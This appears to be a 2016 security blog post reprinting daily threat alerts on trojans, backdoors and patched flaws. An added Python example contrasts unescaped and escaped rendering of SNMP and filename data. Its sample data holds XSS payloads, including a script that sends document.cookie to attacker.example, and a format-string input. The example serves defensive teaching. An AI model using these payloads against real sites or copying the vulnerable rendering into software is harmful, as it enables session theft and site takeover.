Gotham Security Daily Threat Alerts

By Nancy Rand
Posted in Security
On September 08, 2016

September 9, Softpedia – (International) New Linux trojan discovered coded in Mozilla’s Rust language. Dr. Web security researchers discovered a new trojan, written in Mozilla’s Rust programming language, that targets Linux-based platforms. The malware joins an Internet Relay Chat (IRC) channel and treats messages posted there as commands, so an attacker in control of the channel can post a single message to the public chat that every connected bot parses and acts on. The researchers believe this is a test version of the malware, since it currently only gathers information about the infected device’s local system and sends it to its command and control (C&C) server. Source

September 8, SecurityWeek – (International) DropboxCache cross-platform backdoor targets OS X. Kaspersky Lab security researchers discovered that the DropboxCache backdoor, also known as Mokes.A or Backdoor.OSX.Mokes, now targets Apple Mac OS X devices. The malware connects to its command and control (C&C) server over Hypertext Transfer Protocol (HTTP) on Transmission Control Protocol (TCP) port 80 and then activates its backdoor features on the infected device, which include capturing audio, monitoring removable storage, scanning the file system for Microsoft Office documents, and writing the collected data to a series of temporary files when the C&C server is unreachable, among other capabilities. Researchers warned that the malware’s operator can execute arbitrary commands on the infected system and define custom file filters to refine its monitoring of the file system. Source

September 8, Softpedia – (International) WordPress 4.6.1 security update is out, time to update peeps. WordPress released version 4.6.1 of its Content Management System (CMS), resolving a path traversal vulnerability in the upgrade package uploader and a cross-site scripting (XSS) flaw in which an attacker-controlled image filename is rendered unescaped in the admin panel, which could let a malicious actor run script in an administrator’s browser and take over the affected Website. The update also patches 15 other bugs in the CMS codebase. Source

September 8, Help Net Security – (International) Flaws in Network Management Systems open enterprise networks to attacks. Rapid7 researchers and an independent researcher discovered over 12 vulnerabilities across 9 different Network Management System (NMS) products. The flaws fall into three classes: cross-site scripting (XSS) via Simple Network Management Protocol (SNMP) agent-provided data, where an attacker who can place a device on the monitored network (or spoof one) supplies hostile values such as a system name or description that the NMS renders unescaped in its Web console; XSS via SNMP trap alert messages, whose text is likewise rendered unescaped; and format string processing on the NMS Web management console, triggered by specially crafted trap alert messages. Researchers reported that all the flaws have received patches. Source
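The WordPress and NMS items above share one root cause: a string the attacker controls (an uploaded image’s filename, an SNMP agent’s sysName or sysDescr, the text of an SNMP trap) is written into an HTML page without escaping, or, in the format-string case, is used as a template rather than as data. The following Python is an added illustration of that pattern and its fix; it is not code from WordPress, Rapid7 or any NMS vendor. The device records, trap texts and filenames are constructed, sysName and sysDescr are the standard SNMP MIB-II object names, and the TrapRecord class is a hypothetical stand-in for whatever an NMS stores per trap.

```python
"""Rendering attacker-controlled SNMP and media-library strings safely."""
import html
import re

# Constructed sample data: what an NMS might hold after polling SNMP agents and
# receiving traps. The second device reports a hostile sysName and trap text.
DEVICES = [
    {"sysName": "core-sw-01",
     "sysDescr": "Cisco IOS Software, C3750",
     "lastTrap": "linkDown ifIndex=12"},
    {"sysName": '<script>location="http://attacker.example/?c="+document.cookie</script>',
     "sysDescr": "Linux 4.4.0",
     "lastTrap": 'coldStart "><img src=x onerror=alert(1)>'},
]

# Constructed media-library filenames; the second carries a script payload.
FILENAMES = ["photo-2016.jpg", '<img src=x onerror="alert(document.cookie)">.jpg']

UNTRUSTED_FIELDS = ("sysName", "sysDescr", "lastTrap")


def render_vulnerable(devices):
    """Concatenation rendering: agent-provided strings land verbatim in the page."""
    rows = ["<tr>" + "".join("<td>%s</td>" % d[k] for k in UNTRUSTED_FIELDS) + "</tr>"
            for d in devices]
    return "<table>" + "".join(rows) + "</table>"


def render_safe(devices):
    """Same table, every untrusted field passed through html.escape (quotes too)."""
    rows = ["<tr>" + "".join("<td>%s</td>" % html.escape(d[k], quote=True)
                             for k in UNTRUSTED_FIELDS) + "</tr>"
            for d in devices]
    return "<table>" + "".join(rows) + "</table>"


def media_title_vulnerable(filename):
    """Admin-panel title built straight from the uploaded filename."""
    return '<span class="title">%s</span>' % filename


def media_title_safe(filename):
    """Filename is escaped before it reaches the admin-panel markup."""
    return '<span class="title">%s</span>' % html.escape(filename, quote=True)


class TrapRecord:
    """Hypothetical per-trap record kept by the NMS (source address and text)."""
    def __init__(self, source, text):
        self.source = source
        self.text = text


def format_trap_vulnerable(rec):
    """Attacker-controlled trap text used as the *template*: a trap such as
    '{0.__dict__}' pulls object internals into the console output."""
    return rec.text.format(rec)


def format_trap_safe(rec):
    """Fixed template; trap text only ever appears as an argument."""
    return "Trap from {0}: {1}".format(rec.source, rec.text)


# Regression check: no untrusted value that looks like a tag may survive
# verbatim in the rendered page. Returns True when injected markup is found.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def contains_injected_markup(rendered, untrusted_values):
    return any(TAG_RE.search(v) and v in rendered for v in untrusted_values)


if __name__ == "__main__":
    values = [d[k] for d in DEVICES for k in UNTRUSTED_FIELDS]
    print("vulnerable table injected:", contains_injected_markup(render_vulnerable(DEVICES), values))
    print("safe table injected:     ", contains_injected_markup(render_safe(DEVICES), values))
    print(format_trap_vulnerable(TrapRecord("10.0.0.5", "{0.__dict__}")))
    print(format_trap_safe(TrapRecord("10.0.0.5", "{0.__dict__}")))
```

The check at the end is the kind of test a console vendor can run over its own templates: feed every SNMP-sourced field a tag-shaped value and assert that none of them appears verbatim in the output. Escaping at render time, not at ingest, is what keeps the stored sysName searchable while making it inert in the browser.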

September 7, SecurityWeek – (International) Google patches QuadRooter, other critical Android vulnerabilities. Google released its September 2016 Android Security Bulletin resolving 55 vulnerabilities, including 2 critical remote code execution (RCE) flaws in LibUtils and Mediaserver, a high-severity RCE flaw in MediaMuxer, and the remaining 2 of the 4 QuadRooter flaws in Qualcomm components, which reportedly affected over 900 million Android devices using Qualcomm chipsets, among other vulnerabilities. Source

September 7, SecurityWeek – (International) Siemens fixes several flaws in SIPROTEC products. Siemens released firmware updates addressing vulnerabilities in its SIPROTEC 4 and SIPROTEC Compact devices after Kaspersky Lab researchers found two flaws: one that an attacker with network access could exploit to bypass authentication and carry out administrative operations, and one that could allow an attacker with network access to perform those operations while a legitimate user is logged in to the Web interface. Siemens advised customers to use network segmentation, virtual private networks (VPNs), and firewalls to protect their systems against attacks. Source

September 7, SecurityWeek – (International) Gugi banking trojan can bypass Android 6 protection. Kaspersky security researchers discovered a variant of the Gugi mobile banking trojan that bypasses two security features introduced in Google’s Android 6.0: the permission required for apps to draw overlays on top of other apps, and the runtime permission prompts for dangerous actions such as placing calls or sending short message service (SMS) messages. Once it has tricked the user into granting these permissions, the trojan overlays banking applications to steal mobile banking credentials. It is distributed via SMS spam that lures victims to phishing Websites, which download the malware onto the device. Researchers advised users to reboot an infected device in safe mode and attempt to uninstall the trojan. Source

Above reprinted from the USDHS Daily Open Source Infrastructure Report

Nancy Rand

Nancy has more than 20 years’ experience in information technology and security, solving business issues and implementing best-practice solutions that support organizational objectives. Her expertise includes leveraging, optimizing, and implementing diverse technology platforms, and management of large-scale technology projects.